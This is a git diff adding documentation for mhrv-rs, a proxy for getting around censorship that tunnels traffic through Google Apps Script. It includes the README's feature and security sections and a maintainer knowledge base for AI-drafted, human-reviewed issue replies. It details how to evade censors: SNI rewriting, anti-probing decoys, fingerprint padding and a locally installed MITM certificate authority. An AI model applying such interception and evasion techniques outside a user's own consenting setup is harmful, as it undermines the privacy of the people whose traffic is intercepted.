+### SNI pool editor
+
+By default, mhrv-rs rotates through `{www, mail, drive, docs, calendar}.google.com` on outbound TLS to your `google_ip`, to avoid fingerprinting one name too heavily. Some may be locally blocked (e.g. `mail.google.com` has been targeted in Iran at various times).
+
+Either:
+
+- UI → **SNI pool…** → **Test all** → **Keep ✓ only** to auto-trim. Add custom names via the text field at the bottom. Save.
+- Or edit `config.json`:
+
+```json
+{
+  "sni_hosts": ["www.google.com", "drive.google.com", "docs.google.com"]
+}
+```
+
+Leaving `sni_hosts` unset gives you the default auto-pool. Run `mhrv-rs test-sni` to verify what works from your network.
+
+## What's implemented and what isn't
+
+This port focuses on the **`apps_script` mode** — the only one that reliably works against a modern censor in 2026. Implemented:
+
+- [x] Local HTTP proxy (CONNECT for HTTPS, plain forwarding for HTTP)
+- [x] Local SOCKS5 with smart TLS / HTTP / raw-TCP dispatch (Telegram, xray, etc.)
+- [x] MITM with on-the-fly per-domain certs via `rcgen`
+- [x] CA generation + auto-install on macOS / Linux / Windows
+- [x] Firefox NSS cert install (best-effort via `certutil`)
+- [x] Apps Script JSON relay protocol-compatible with `Code.gs`
+- [x] Connection pooling (45 s TTL, max 20 idle)
+- [x] Gzip response decoding
+- [x] Multi-script round-robin
+- [x] Auto-blacklist failing scripts on 429 / quota errors (10 min cooldown)
+- [x] Response cache (50 MB, FIFO + TTL, `Cache-Control: max-age` aware, heuristics for static assets)
+- [x] Request coalescing: concurrent identical GETs share one upstream fetch
+- [x] SNI-rewrite tunnels for `google.com`, `youtube.com`, `youtu.be`, `youtube-nocookie.com`, `fonts.googleapis.com`, configurable via `hosts` map
+- [x] Automatic redirect handling on the relay (`/exec` → `googleusercontent.com`)
+- [x] Header filtering (strip connection-specific, brotli)
+- [x] `test` and `scan-ips` subcommands
+- [x] Script IDs masked in logs (`prefix…suffix`) so logs don't leak deployment IDs
+- [x] Desktop UI (egui) — cross-platform, no bundler needed
+- [x] Optional upstream SOCKS5 chaining for non-HTTP traffic (Telegram MTProto, IMAP, SSH…)
+- [x] Connection pool pre-warm on startup
+- [x] Per-connection SNI rotation across `{www, mail, drive, docs, calendar}.google.com`
+- [x] Optional parallel script-ID dispatch (`parallel_relay`): fan-out to N script instances, return first success
+- [x] Per-site stats drill-down in the UI (requests, cache hit %, bytes, avg latency per host)
+- [x] Editable SNI rotation pool (UI window + `sni_hosts` config field) with reachability probes
+- [x] OpenWRT / Alpine / musl builds — static binaries, procd init script included
+- [x] **Exit node** support for Cloudflare-fronted sites (v1.9.4+)
+- [x] **Goog.script.init iframe unwrap** — defense-in-depth against deployments that return HtmlService-wrapped responses (v1.9.6+)
+
+Intentionally **not** implemented:
+
+- **HTTP/2 multiplexing** — `h2` crate state machine has too many subtle hang cases; coalescing + 20-conn pool gets most of the benefit
+- **Request batching (`q:[...]` mode in apps_script mode)** — connection pool + tokio async already parallelizes well; batching adds ~200 lines of state for unclear gain
+- **Range-based parallel download** — edge cases real (non-Range servers, chunked mid-stream); YouTube already bypasses Apps Script via SNI-rewrite tunnel
+- **Other modes** (`domain_fronting`, `google_fronting`, `custom_domain`) — Cloudflare killed generic domain fronting in 2024; Cloud Run needs a paid plan
+
+## Known limitations
+
+These are inherent to the Apps Script + domain-fronting approach, not bugs in this client. The original Python version has the same issues.
+
+- **User-Agent fixed to `Google-Apps-Script`** for traffic through the relay. `UrlFetchApp.fetch()` doesn't allow override. Sites that detect bots (Google search, some CAPTCHAs) serve degraded / no-JS pages. Workaround: add the affected domain to the `hosts` map so it's routed through the SNI-rewrite tunnel with your real browser's UA. `google.com`, `youtube.com`, `fonts.googleapis.com` are already there.
+- **Video playback slow and quota-limited** for anything through the relay. YouTube HTML loads fast (SNI-rewrite tunnel), but `googlevideo.com` chunks go through Apps Script. Free tier: ~20k `UrlFetchApp` calls / day, 50 MB body cap per fetch. Fine for text browsing, painful for 1080p. Rotate multiple `script_id`s for headroom, or use a real VPN for video.
+- **Brotli stripped** from forwarded `Accept-Encoding`. Apps Script can decompress gzip but not `br`; forwarding `br` would garble responses. Minor size overhead.
+- **WebSockets don't work** through the relay — it's request / response JSON. Sites that upgrade to WS fail (ChatGPT streaming, Discord voice, etc.).
+- **HSTS-preloaded / hard-pinned sites** reject the MITM cert. Most sites are fine; a handful aren't.
+- **Google / YouTube 2FA and sensitive logins** may trigger "unrecognized device" warnings because requests originate from Google's Apps Script IPs, not yours. Log in once via the tunnel (`google.com` is in the rewrite list) to avoid this.
+
+## Security posture
+
+- The MITM root **stays on your machine only**. `ca/ca.key` private key is generated locally and never leaves the user-data dir.
+- `auth_key` is a shared secret you pick. Server-side `Code.gs` rejects requests without a matching key.
+- Traffic between your machine and Google's edge is standard TLS 1.3.
+- What Google can see: the destination URL and headers of each request (Apps Script fetches on your behalf). Same trust model as any hosted proxy — if not acceptable, use a self-hosted VPN instead.
+- **IP exposure caveat (`apps_script` mode):** v1.2.9 strips every `X-Forwarded-For` / `X-Real-IP` / `Forwarded` / `Via` / `CF-Connecting-IP` / `True-Client-IP` / `Fastly-Client-IP` and ~10 related identity-revealing headers from outbound before reaching Apps Script ([#104](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/104)). What it does **not** cover: whatever Google's own infrastructure may add when its Apps Script runtime makes the subsequent `UrlFetchApp.fetch()` to the target. That second leg is server-side, outside this client's control. Destination sees a Google datacenter IP, but no public guarantee Google never propagates the original caller's IP in some internal header chain. If your threat model requires the destination cannot under any circumstances learn your IP, **use Full Tunnel mode** (traffic exits from your own VPS, only the VPS IP is exposed end-to-end). `apps_script` mode is fine for bypassing DPI / reaching blocked sites where "seen by Google" is acceptable. Raised in [#148](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/148).
+- v1.9.6+ Code.gs / CodeFull.gs also strip `X-Forwarded-*` / `Forwarded` / `Via` server-side as a second line of defense.
+
+## FAQ
+
+**How many Deployment IDs do I need?** One is fine for normal use. The free `UrlFetchApp` quota is 20,000 fetches / day per account (100,000 for paid Workspace), with a 50 MB body cap per fetch. Use **one deployment per Google account** — the 30-concurrent limit is per account, so multiple deployments on the same account don't add concurrency. To scale, deploy in different Google accounts. Reference: <https://developers.google.com/apps-script/guides/services/quotas>
+
+**Why does Google search show without JavaScript sometimes?** Apps Script is forced to set `User-Agent: Google-Apps-Script`. Some sites detect that and serve no-JS fallback. Domains in the SNI-rewrite list (`google.com`, `youtube.com`, etc.) are immune because they go directly to Google's edge, not through Apps Script.
+
+**Is logging into a Google account through this safe?** Recommended: log in once **without** the proxy, or with a real VPN, the first time. Google may flag the Apps Script IP as an "unknown device" and warn. After the initial login, use is fine.
+
+**How do I remove the certificate later?**
+- **Easiest (any OS):** click **Remove CA** in the UI, or:
+  - macOS / Linux: `sudo ./mhrv-rs --remove-cert`
+  - Windows (run as administrator): `mhrv-rs.exe --remove-cert`
+  - Removes from system trust store, NSS (Firefox / Chrome on Linux), and deletes `ca/ca.crt` + `ca/ca.key` on disk. Your `config.json` and Apps Script deployment are not touched.
+- **Manually:** the cert's Common Name is `MasterHttpRelayVPN` (not `mhrv-rs` — that's the app name).
+  - **macOS:** Keychain Access → System → search `MasterHttpRelayVPN` → delete. Then `rm -rf ~/Library/Application\ Support/mhrv-rs/ca/`
+  - **Windows:** `certmgr.msc` → Trusted Root Certification Authorities → search `MasterHttpRelayVPN` → delete
+  - **Linux:** delete `/usr/local/share/ca-certificates/MasterHttpRelayVPN.crt` then `sudo update-ca-certificates`
+
+**`GLIBC_2.39 not found` error on Linux?** Use `mhrv-rs-linux-musl-amd64.tar.gz` — fully static, runs on any Linux without `glibc`.
+
+## License
+
+MIT. See [LICENSE](../LICENSE).
diff --git a/docs/maintainer/README.md b/docs/maintainer/README.md
new file mode 100644
index 00000000..5639af45
--- /dev/null
+++ b/docs/maintainer/README.md
@@ -0,0 +1,18 @@
+# Maintainer knowledge base
+
+Project-internal knowledge base for triaging issues, reviewing PRs, cutting releases, and writing user-facing replies in the project's voice. Treat this as canonical context for any maintenance work — local or automated.
+
+## Read order
+
+Start with `SKILL.md` for orientation, conventions, and pointers. Then read references lazily as relevant to the current task:
+
+- `references/architecture.md` — apps_script vs Full mode, MITM CA, tunnel-node, AUTH_KEY/TUNNEL_AUTH_KEY/DIAGNOSTIC_MODE, SNI rewriting, Apps Script's hidden constraints
+- `references/issue-patterns.md` — recurring user issue patterns with diagnostic procedures and canonical reply structures
+- `references/diagnostic-taxonomy.md` — six candidate causes for the placeholder body, DIAGNOSTIC_MODE disambiguator
+- `references/workflow-conventions.md` — reply marker, Persian/English match rule, changelog format, commit messages, close reasons
+- `references/release-workflow.md` — Cargo.toml → tag → Telegram pipeline
+- `references/contributors.md` — core contributor roles + their substantive PRs
+- `references/roadmap.md` — current and upcoming release batches
+- `references/persian-templates.md` — adaptable Persian reply templates and standardized phrasings
+- `assets/changelog-template.md` — starter template for a new `docs/changelog/vX.Y.Z.md`
+- `assets/reply-marker.md` — the standard reply footer
diff --git a/docs/maintainer/SKILL.md b/docs/maintainer/SKILL.md
new file mode 100644
index 00000000..e24568b6
--- /dev/null
+++ b/docs/maintainer/SKILL.md
@@ -0,0 +1,114 @@
+# mhrv-rs maintenance
+
+This document encodes the project context, recurring patterns, and conventions needed to ship code, triage issues, and respond to users effectively. It is the entry point to the broader knowledge base in `references/`.
+
+## Why this matters
+
+mhrv-rs is **infrastructure for circumvention**. The bulk of the userbase is in Iran — under one of the world's heaviest internet censorship regimes — using this tool to reach YouTube, Wikipedia, Telegram, GitHub, news sites, banking, and (critically) to communicate with family abroad. A non-trivial fraction of users are in Russia, China, Belarus, and other censored networks, but Iran dominates the issue tracker.
+
+The architecture's importance is the architecture itself: by routing traffic through Google Apps Script, the user's ISP only sees encrypted HTTPS to Google IPs (`216.239.38.120` etc.) — the exact same fingerprint as `www.google.com`. ISPs that block conventional VPNs are forced to either let mhrv-rs through or break Google access for the entire country. This asymmetry is what makes the project work, and it shapes every architectural decision.
+
+When responding to a Persian-language issue, the responder is often the only English-speaking maintainer the reporter has access to. Be clear, generous, and specific. When shipping a release, you're shipping it to people for whom the alternative is not "use a different tool" but "lose internet access". This drives the project's bias toward shipping over polish, toward backwards-compatible defaults, and toward documenting workarounds even when the proper fix is months away.
+
+## Working directory and conventions
+
+This is a standard Rust project. `cd` into your local clone before running git/gh/cargo commands, or use absolute paths. Reply markdown files for `gh issue comment --body-file` are conventionally written to a temporary file (e.g., `/tmp/...`) before posting, to avoid HEREDOC quoting issues with backticks and `$()` substitutions.
+
+## Reference files (read as needed)
+
+This knowledge base is structured for progressive disclosure. The body below covers conventions and reflexes; the reference files have the deep context for specific tasks. Read them lazily — only the ones relevant to what you're doing.
+
+- **`references/architecture.md`** — Read when explaining the system to a user, debugging unfamiliar log patterns, or making an architectural decision. Covers domain fronting, apps_script vs Full mode, MITM CA, tunnel-node, the AUTH_KEY/TUNNEL_AUTH_KEY/DIAGNOSTIC_MODE distinction, SNI rewriting, and `google_ip` rotation.
+- **`references/issue-patterns.md`** — Read when triaging a new issue. Catalogs the most common user-reported issue patterns with diagnostic procedures and canonical reply structures.
+- **`references/diagnostic-taxonomy.md`** — Read when a user shows a failure log with `no json in batch response` or HTML body. The six candidate causes for the placeholder body, what each looks like, and how `DIAGNOSTIC_MODE=true` disambiguates them.
+- **`references/workflow-conventions.md`** — Read when writing a reply, changelog, or commit message. Reply marker, Persian-vs-English language convention, changelog format, semver discipline.
+- **`references/release-workflow.md`** — Read when cutting a release. Cargo.toml bump → changelog → commit → tag → push, then auto-fired CI handles the rest (release builds + Telegram channel publishing).
+- **`references/contributors.md`** — Read when interacting with named contributors. Each top contributor has a domain they specialize in.
+- **`references/roadmap.md`** — Read when categorizing a feature request. Current and upcoming release batches.
+- **`references/persian-templates.md`** — Read when writing a Persian reply. Common phrases and full-paragraph templates for the most-repeated Persian-language situations.
+- **`assets/changelog-template.md`** — Use as the starting template when creating a new `docs/changelog/vX.Y.Z.md` file.
+- **`assets/reply-marker.md`** — The exact reply footer to append to every issue/PR comment.
+
+## Conventions to internalize
+
+These show up so frequently they should be memorized rather than looked up each time.
+
+### The reply marker
+
+Every substantive issue or PR comment ends with this exact footer (with a literal `---` HR before it):
+
+```
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+This is non-negotiable. Users in this community recognize the marker. It signals that the reply was drafted by Claude and reviewed by the maintainer before posting. Don't omit it, don't paraphrase it, don't translate "reviewed by" into Persian.
+
+### Persian or English: match the user
+
+If the user wrote in Persian, reply in Persian. If they wrote in English, reply in English. If they mixed (common), match the dominant language. Never assume Iranian users want English — many are more comfortable in Persian and the message lands better in their language.
+
+Code blocks, command examples, technical terms (`AUTH_KEY`, `script_id`, `parallel_concurrency`), URLs, and the reply marker always stay in their original Latin form. Don't translate them.
+
+### Public artifact tone
+
+Anything that goes into the public repo — issue replies, PR comments, commit messages, PR descriptions, changelogs — is full prose, written warmly and clearly. Persian or English, adjust to the user. Iranian users especially read carefully and brevity reads as cold or dismissive in this context. Use full sentences. Explain reasoning. Be patient.
+
+### Semver discipline
+
+The project uses `vX.Y.Z` strictly:
+- **X (major)** — currently `1`. Bump only on a true ABI/protocol break with the Apps Script side.
+- **Y (minor)** — feature batch. Bump when shipping a coherent set of features (e.g. v1.7 → v1.8).
+- **Z (patch)** — small fix or single-feature addition that doesn't justify a minor bump. Most releases are patch bumps.
+
+Patch releases (v1.8.1, v1.8.2, v1.8.3) ship continuously — every time something user-visible lands. Don't sit on completed work; releases are cheap and Iranian users who ask "when's the fix shipping?" deserve "in the next 30 minutes" not "next week". The release CI is fast (~30 min from tag push to Telegram publish).
+
+### Persian-then-English changelog
+
+Every changelog file in `docs/changelog/vX.Y.Z.md` follows this exact format:
+
+```markdown
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• [bullet 1 in Persian]
+• [bullet 2 in Persian]
+---
+• [same bullet 1 in English]
+• [same bullet 2 in English]
+```
+
+Persian comes first because the userbase is majority-Persian. The English version is for international contributors and the public repo audience. Both versions cover the same content but are written natively in each language — not machine-translated.
+
+### When to close issues
+
+Close immediately:
+- **Resolved** — user confirmed fix works (`gh issue close N --reason completed`)
+- **Duplicate** — point to canonical thread (`gh issue close N --reason "not planned"`)
+- **Architectural limit** — feature can't be implemented due to Apps Script restrictions (close with explanation, mark as `not planned`)
+
+Keep open:
+- **Tracking** — issue serves as canonical reference for a roadmap item (e.g., #313 for ISP throttle, #300 for SABR cliff, #420 for dual-VPS docs)
+- **Awaiting user verification** — a fix/workaround was posted, waiting for user to confirm
+- **Active diagnostic** — back-and-forth with user gathering data
+
+When closing as duplicate, always include the canonical issue number in the close comment so future readers can navigate.
+
+## DOPR (Daily Open PR + Issue Triage) cycle
+
+For "do DOPR", "check issues", "issues, prs", or similar requests, the workflow is:
+
+1. **List open PRs**: `gh pr list --state open --limit 20`
+2. **List recently-updated issues**: `gh issue list --state open --limit 30 --search "sort:updated-desc"`
+3. **For each PR**: review the diff, check CI, decide merge/comment/decline. New PRs from new accounts that look like supply-chain-pattern (typosquat, "update requirements.txt" with weird deps, rebrand-and-replace) get declined politely. Substantive code from known contributors generally gets merged after a local `cargo test --lib` + build. See `references/contributors.md` for who's known.
+4. **For each issue updated since last DOPR**: read the latest comments. If there's a new user message, reply substantively (not just "thanks, will look into it"). If there's user confirmation that a fix worked, close the issue. If you've been waiting on user data and they haven't responded for several days, the issue can stay open or be closed with "Closing for now; reopen if it's still happening." (use judgment).
+5. **If anything user-visible landed**: cut a patch release. Don't batch up 5 PRs into one big release — ship one at a time.
+6. **For each new substantive issue**: write a real reply. Default to writing it in a temp file (e.g., `/tmp/r-<issue>-<topic>.md`) and posting via `gh issue comment N --body-file ...` (avoids HEREDOC quoting hell with backticks and `$()`).
+
+DOPR replies should not be templated. Use the issue-patterns reference to recognize the situation, then write a reply that addresses _this user's specific report_ — their log lines, their config, their setup. Templated replies are easy to spot and erode trust.
+
+## Operational guardrails
+
+- **Don't merge PRs without local verification** — `git fetch && gh pr checkout N && cargo test --lib && cargo build --release`. CI doesn't run tests on PRs in this repo (only the release-drafter), so local verification is the real gate.
+- **Don't push to `main` while a release is mid-flight** — `release.yml` auto-fires on tag push and races with subsequent commits. Wait for the release CI to complete before merging more PRs.
+- **Don't skip the `--reason` flag on `gh issue close`** — `completed` for resolved, `not planned` for duplicates and architectural limits.
+- **Don't update `docs/changelog/` for already-released versions** — the file is the historical record of what shipped. New work goes into a new file for the next version.
+- **Don't share AUTH_KEYs, TUNNEL_AUTH_KEYs, or deployment IDs** that a user posted in an issue. They might think they obfuscated them, but if they didn't, don't quote them back. If you need to reference them, use `YOUR_AUTH_KEY` / `<deployment_id>` placeholders.
diff --git a/docs/maintainer/assets/changelog-template.md b/docs/maintainer/assets/changelog-template.md
new file mode 100644
index 00000000..e5f8ffd2
--- /dev/null
+++ b/docs/maintainer/assets/changelog-template.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• [توضیح bullet اول به فارسی، با link به issue/PR — مثال: ([#NNN](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/NNN), PR [#MMM](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/MMM) از @contributor)]: شرح آنچه تغییر کرده + چرا اهمیت داره. اطلاعات معماری مرتبط، مقادیر default، و escape hatch‌ها برای کاربرانی که می‌خواهن behavior قدیم رو نگه دارن
+• [bullet دوم — همین structure: تغییر + چرا + escape hatch]
+• [اگر breaking change وجود داره: **شکستگی سازگاری**: شرح breaking + migration steps]
+---
+• [bullet 1 in English ([#NNN](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/NNN), PR [#MMM](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/MMM) by @contributor): description of what changed and why it matters. Architectural context, default values, and escape hatch for users who want to preserve old behavior]
+• [bullet 2 in English with the same structure: change + why + escape hatch]
+• [if breaking change: **Breaking change**: description + migration steps]
diff --git a/docs/maintainer/assets/reply-marker.md b/docs/maintainer/assets/reply-marker.md
new file mode 100644
index 00000000..37d98b40
--- /dev/null
+++ b/docs/maintainer/assets/reply-marker.md
@@ -0,0 +1,2 @@
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
diff --git a/docs/maintainer/references/architecture.md b/docs/maintainer/references/architecture.md
new file mode 100644
index 00000000..476b01df
--- /dev/null
+++ b/docs/maintainer/references/architecture.md
@@ -0,0 +1,122 @@
+# Architecture
+
+## What mhrv-rs is
+
+mhrv-rs is the Rust port of [`masterking32/MasterHttpRelayVPN`](https://github.com/masterking32/MasterHttpRelayVPN) (Python). It's an HTTP proxy that runs locally on the user's machine (Windows / macOS / Linux / Android, with OpenWRT and Raspbian builds for sidecars) and bridges browser/app traffic out through Google Apps Script.
+
+The architectural unlock: from the user's ISP perspective, all traffic looks like normal HTTPS to a Google IP. ISPs that censor by SNI / domain / TLS-fingerprint can't block the relay without breaking Google access for their entire customer base. ISPs that censor by destination IP can't block it either, because the destinations are Google data centers.
+
+Apps Script's `UrlFetchApp.fetch()` is the workhorse — it's a Google-blessed API for outbound HTTPS, and Google effectively runs an open proxy to the rest of the internet on every Apps Script user's behalf.
+
+## Two operating modes
+
+### apps_script mode (default)
+
+```
+client app → mhrv-rs HTTP/SOCKS5 listener →
+  MITM (intercepts HTTPS, signs with local CA) →
+  POST batch to Apps Script Web App →
+  Apps Script's UrlFetchApp.fetch() → upstream destination →
+  Apps Script returns body → mhrv-rs returns to client
+```
+
+- **Code.gs** (in `assets/apps_script/Code.gs`) is the script the user deploys to their own Google account at `script.google.com`. Each deployment gets a `script_id` like `AKfycbz1abc...`.
+- The MITM layer signs HTTPS leaf certs on the fly using a CA installed in the user's trust store. This lets mhrv-rs read the plaintext request, batch it through Apps Script, and return the response to the client.
+- All upstream protocols are HTTP/HTTPS. **No UDP, no MTProto, no QUIC, no WebRTC.** Apps Script can't carry them.
+- Per-Apps-Script-account quota: ~20,000 UrlFetchApp calls/day, 30 concurrent, 6-min per-invocation cap, 30s soft response cliff.
+
+### Full mode
+
+```
+client app → mhrv-rs SOCKS5 →
+  signal/control via Apps Script (small JSON RPC) →
+  Apps Script calls into tunnel-node container on user's VPS →
+  tunnel-node opens TCP socket to upstream →
+  bytes flow through tunnel-node ↔ Apps Script ↔ mhrv-rs ↔ client
+```
+
+- **CodeFull.gs** (in `assets/apps_script/CodeFull.gs`) is a different Apps Script — replaces Code.gs's local-fetch with calls to a tunnel-node container.
+- **tunnel-node** is a small axum-based Rust HTTP server (in `tunnel-node/`) that the user runs on their own VPS via Docker. Image: `ghcr.io/therealaleph/mhrv-tunnel-node:latest`.
+- The bytes flow through the actual TCP tunnel between tunnel-node and the upstream server — Apps Script only handles the **signaling** for tunnel session lifecycle. This means Apps Script's 30s response cap doesn't apply to long-running connections (no SABR cliff). Bigger uploads/downloads work.
+- Trade-off: requires a VPS ($3-5/month from Hetzner/Contabo/OVH/Parspack), more setup steps, three places to keep AUTH_KEYs in sync.
+- The VPS does NOT need to be reachable from Iran directly. Apps Script (running in Google's data center) is the one that talks to the VPS, so the user's ISP only sees the user-to-Apps-Script leg, which is Google IPs.
+
+## The three secrets
+
+These are the constant source of user confusion. Get the names right:
+
+| Secret | Lives where | Must match | Notes |
+|--------|-------------|------------|-------|
+| `AUTH_KEY` (or `auth_key` in mhrv-rs config.json) | mhrv-rs `config.json` ↔ `Code.gs`/`CodeFull.gs` | Both ends | Per-deployment user secret; protects against random people hitting the user's deployment URL. Editing it in Code.gs without **redeploying as a new version** in Apps Script is the single most common user mistake. |
+| `TUNNEL_AUTH_KEY` | `CodeFull.gs` ↔ tunnel-node container env var | Both ends | Full mode only. Env var name is **literally `TUNNEL_AUTH_KEY`** — uppercase, with underscores, exact string. Several users have written `MHRV_AUTH_KEY` (wrong) or `Tunnel` (wrong); the env var is case-sensitive in Linux/Docker and any deviation falls back to the default `changeme`. |
+| `DIAGNOSTIC_MODE` | `Code.gs` and `CodeFull.gs` (constant at top) | n/a — local toggle | When `false` (default), the script returns a benign HTML decoy (`"The script completed but did not return anything"`) for bad-auth requests, mimicking Apps Script's own placeholder. When `true`, returns explicit JSON `{"e":"unauthorized"}`. The decoy mode is anti-active-probing defense (#357 pattern); diagnostic mode is for setup. |
+
+## Apps Script's hidden constraints
+
+These are constraints Google enforces on Apps Script's `UrlFetchApp.fetch()` that shape what mhrv-rs can and can't do:
+
+1. **Self-loop restriction** — `UrlFetchApp.fetch()` blocks calls to `*.google.com`, `*.googleapis.com`, `*.gstatic.com`, `*.googleusercontent.com`. **Google services are unreachable through apps_script mode by design.** Includes `gmail.com`, `meet.google.com`, `colab.research.google.com`, `drive.google.com`, `script.google.com` itself (ironic — you can't proxy your way to manage your own deployment). Workaround for users with VPS: dual-routing in xray (route Google direct from VPS, everything else through mhrv-rs). Without VPS, no workaround — point users at #420.
+2. **30-second response cliff** — Apps Script Web Apps have a soft cap of 30s on the response. Long downloads or video streams (YouTube SABR, large file downloads >50 MB through MITM) get truncated. Tracked as #300 (SABR cliff). v1.9.0 xmux roadmap aims to mitigate by splitting across deployments.
+3. **6-minute per-invocation cap** — hard limit. After this, `UrlFetchApp.fetch()` throws and Apps Script kills the request.
+4. **30 concurrent executions per Apps Script account** — affects users who put the same `script_id` under heavy load. Lower `parallel_concurrency` in mhrv-rs config to avoid hitting this.
+5. **Daily quota: 20,000 UrlFetchApp calls per Google account** — resets at 00:00 UTC. Multi-deployment rotation across multiple Google accounts is the workaround.
+6. **Per-100s rolling soft quota** — undocumented but consistently observed. When tripped, returns the placeholder body (one of the 6 candidate causes for the placeholder; see `diagnostic-taxonomy.md`).
+7. **Localized error pages** — Apps Script returns its placeholder body in the locale of the deploying account or origin IP. For Iranian users, this means a Persian HTML page. v1.8.3 detection now distinguishes this case.
+
+## The MITM CA
+
+To intercept HTTPS in apps_script mode, mhrv-rs runs a per-machine CA:
+
+- Generated on first run, stored at `<data_dir>/ca/ca.crt` and `ca.key`.
+- Installed into the user's OS trust store via the `cert_installer` module.
+- On Windows: user-trust store via `certutil -addstore`.
+- On macOS: login keychain via `security`.
+- On Linux: distro-specific (NSS for Firefox, system bundle for Chrome/curl).
+- **On Android**: only the **user trust store**, not system. Most apps (YouTube, Gmail, Telegram, Instagram, banking) only trust the system store, so they don't see mhrv-rs. Chrome/Firefox/Edge browsers explicitly opt in to user trust and DO use mhrv-rs. This is the Android user-trust-store gotcha that drives much of the Android UX confusion. Workaround for power users: root + Magisk + MagiskTrustUserCerts module migrates user CA to system.
+
+The `--remove-cert` CLI flag tears down the CA cleanly (uninstall from trust store + delete files). PR #121 from `dazzling-no-more` added this; lives in `src/main.rs` `remove_cert` flow.
+
+## SNI rewriting + google_ip rotation
+
+The TLS handshake between mhrv-rs and Apps Script does:
+
+- **TCP connect** to `google_ip` (default `216.239.38.120` — a Google edge IP)
+- **TLS SNI** = `www.google.com` (rewritten — this is what the ISP sees in cleartext)
+- **HTTP Host header** = `script.google.com` (the real destination, hidden inside the encrypted tunnel)
+
+Iran ISPs occasionally filter specific Google IPs (#313 pattern). When this happens, the user can rotate `google_ip` to another IP from `DEFAULT_GOOGLE_SNI_POOL` (the 12-entry list in `src/domain_fronter.rs`). `mhrv-rs scan-ips` is a diagnostic command that probes Google IPs from the user's network and reports which ones complete TLS handshakes.
+
+`scan_config.json` (separate from main `config.json`) is the input for `mhrv-rs scan-ips` — users sometimes confuse the two and put the scan config where the main config should be. See `issue-patterns.md`.
+
+## v1.8.0 anti-fingerprinting features
+
+- **Random padding** (`_pad` field, 0-1024 bytes uniform random, base64) — defeats DPI length-distribution fingerprinting. Users on heavily-throttled ISPs can disable with `disable_padding: true` (~25% bandwidth savings) — landed in v1.8.1.
+- **Auto-blacklist deployments** that timeout repeatedly (#319) — round-robin pool actively excludes failing deployments for a cooldown period. Tunable strike threshold queued for v1.8.x.
+- **Decoy responses** for bad-auth requests — see `DIAGNOSTIC_MODE` above.
+- **Active-probing defense** — random benign body on `doGet` requests so a probe to the deployment URL doesn't reveal that it's a relay.
+
+## v1.8.3 features (just shipped)
+
+- **DoH bypass** — DNS-over-HTTPS to Cloudflare/Google/Quad9/AdGuard/etc. routes around the Apps Script tunnel via plain TCP/443. Saves ~2s per DNS lookup. Default on; opt out with `tunnel_doh: true`.
+- **H1 container keepalive** — 240s ping to prevent Apps Script V8 cold-start stalls. Visible win for YouTube playback after pause.
+- **64 KB header cap with HTTP 431** — replaces silent socket drops that caused browser retry loops on oversized headers.
+- **Spreadsheet-backed response cache** in Code.gs (opt-in via `CACHE_SPREADSHEET_ID`) — TTL-aware, Vary-aware, circular-buffer for O(1) writes. Reduces UrlFetchApp quota consumption.
+
+## Key files in the repo
+
+- `src/main.rs` — CLI binary entry point. `init_logging()` reads `config.log_level`. `Cmd::Test`, `Cmd::ScanIps`, etc. as subcommands.
+- `src/bin/ui.rs` — UI binary entry (Windows + Android via JNI). Shares lib code via `mhrv_rs::*`. The `install_ui_tracing` function (post-v1.8.2) reads `RUST_LOG > config.log_level > info,hyper=warn`.
+- `src/lib.rs` — re-exports for the lib + Android JNI shim.
+- `src/domain_fronter.rs` — the SNI-rewrite TLS dialer + the `DomainFronter` orchestrator. `DEFAULT_GOOGLE_SNI_POOL` lives here.
+- `src/proxy_server.rs` — HTTP/SOCKS5 listeners, dispatch logic, DoH bypass, MITM mode entry.
+- `src/tunnel_client.rs` — Full mode batch client. Decoy detection + script_id-in-logs added v1.8.1; softer 6-cause message v1.8.3.
+- `src/mitm/` — MITM cert manager.
+- `src/cert_installer/` — per-OS trust store installation logic.
+- `src/config.rs` — `Config` struct + JSON serde. Default values, validation.
+- `assets/apps_script/Code.gs` and `CodeFull.gs` — server-side scripts. Edit these and tell users to redeploy as new version in Apps Script.
+- `tunnel-node/` — separate Rust crate for the Full-mode VPS container. README + README.fa.md (Persian translation).
+- `android/app/src/main/java/com/therealaleph/mhrv/` — Android Kotlin glue. `MhrvVpnService.kt` is the VPNService that calls into Rust via JNI. `ConfigStore.kt` is the form/preferences round-trip.
+- `docs/changelog/` — versioned changelog files. Format: Persian, then `---`, then English.
+- `.github/workflows/release.yml` — release CI: builds for all platforms, attaches to GitHub release.
+- `.github/workflows/telegram-publish-files.yml` — fires on `workflow_run` of release.yml; posts each file individually to the Telegram channel `-1003966234444` with Persian captions, SHA-256 in caption, and a cross-link from the main channel.
+- `.github/scripts/telegram_publish_files.py` — stdlib-only Python script that does the actual Telegram posting (no `requests` dep so it works in minimal CI runners).
diff --git a/docs/maintainer/references/contributors.md b/docs/maintainer/references/contributors.md
new file mode 100644
index 00000000..1330fd5f
--- /dev/null
+++ b/docs/maintainer/references/contributors.md
@@ -0,0 +1,126 @@
+# Contributor ecosystem
+
+The project's substantive contributors fall into a few specialty domains. Knowing who-does-what lets you tag the right reviewer, weight feedback appropriately, and route new design decisions to the people most likely to have informed opinions.
+
+## Project owner
+
+### @therealaleph
+
+Maintainer. Final authority on architectural decisions, release timing, what merges. Persian/English bilingual. Replies that go through Claude carry the marker `[reply via Anthropic Claude | reviewed by @therealaleph]` and are reviewed before posting.
+
+## Core community contributors
+
+These are the contributors whose substantive PRs and reports have shaped the project's roadmap. When designing features that touch their domain, tag them for review.
+
+### @w0l4i
+
+**Domain**: deep diagnostic feedback, architectural insight, persistence on hard bugs.
+
+**Notable contributions**:
+- Drove the v1.8.1 → v1.8.2 → v1.8.3 evolution of decoy detection. Reported the false-positive in v1.8.1 that led to the 4-cause taxonomy (then 5-cause, then 6-cause).
+- Reported the Persian-localized quota body case (#404) after multiple iterations through wrong hypotheses (third-party relay → Iranian VPS appliance → Hetzner DE → Apps Script account locale).
